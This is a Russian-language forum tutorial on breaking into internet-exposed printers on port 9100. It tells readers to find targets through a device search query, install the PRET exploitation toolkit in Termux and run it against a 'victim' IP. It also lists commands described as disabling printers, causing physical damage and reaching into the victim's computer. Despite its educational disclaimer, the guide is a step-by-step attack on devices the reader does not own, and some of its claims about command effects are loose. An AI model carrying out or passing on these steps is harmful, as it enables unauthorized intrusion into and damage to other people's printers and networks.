Гайд Взлом принтеров с помощью termux

[wlux.net]

Данная статья представлена исключительно в ознакомительных целях и не несет призыва к действию. Вся информация направлена на то, чтобы уберечь читателей от противозаконных действий.

Категорически запрещено использование разработки для совершения любых противоправных действий.

Всем привет! В сегодняшней статье разберём взлом принтеров с помощью termux.

Часть 1​

Данная уязвимость размещается на 9100 порту. С помощью этого открытого порта можем подключиться к любому принтеру, и из него уже провернуть что-то масштабное.

Откуда же брать Ip адреса уязвимых принтеров?​

Ответ очень прост - заходим на сайт

Пожалуйста, войдите или зерегистрируйтесь, чтобы увидеть скрытый текст.

, потом пишем следующую команду:

port:9100 pjl

И выбираем любой понравившейся )


Теперь приступим к утилите, которая будет осуществлять взлом.

PRET - утилита для проверки на защищенность вашего принтера.

Установка:​

pkg update

pkg upgrade

pkg install git

pkg install python2 python

git clone

Пожалуйста, войдите или зерегистрируйтесь, чтобы увидеть скрытый текст.

cd PRET

pip install colorama pysnmP

Установка закончена, теперь запускаем:

Запуск:

python2 pret.py <IP> pjl

Вместо <IP> вводим ip жертвы, пример : python2 pret.py 192.168.1.1 pjl

У вас высветится что-то подобное:

$ ./pret.py <IP> pjl
________________
_/_______________/|
/___________/___//|| PRET | Printer Exploitation Toolkit v0.25
|=== |----| || by Jens Mueller <[email protected]>
| | ô| ||
|___________| ô| ||
| ||/.´---.|| | || 「 cause your device can be
|-||/_____\||-. | |´ more fun than paper jams 」
|_||=L==H==||_|__|/

(ASCII art by
Jan Foerster)

Connection to laserjet.lan established
Device: hp LaserJet 4250

Welcome to the pret shell. Type help or ? to list commands.
laserjet.lan:/> help

Available commands (type help <topic>):
=======================================
append debug edit free id ls open restart timeout
cat delete env fuzz info mirror printenv selftest touch
cd df exit get load mkdir put set traversal
chvol disable find help lock nvram pwd site unlock
close display format hold loop offline reset status version

Теперь объясню некоторые команды:

disable - выключение принтера

destroy - физический урон

fuzz path - команда покажет директории которые были связанны с принтером. Можно с простого принтера залезть в компьютер жертвы.

print - распечатать что-либо

display <TEXT> - вывести какую-либо информацию на дисплей принтера

 

[SANDWIVH]

тема лишь забавы ради реального применения не вижу(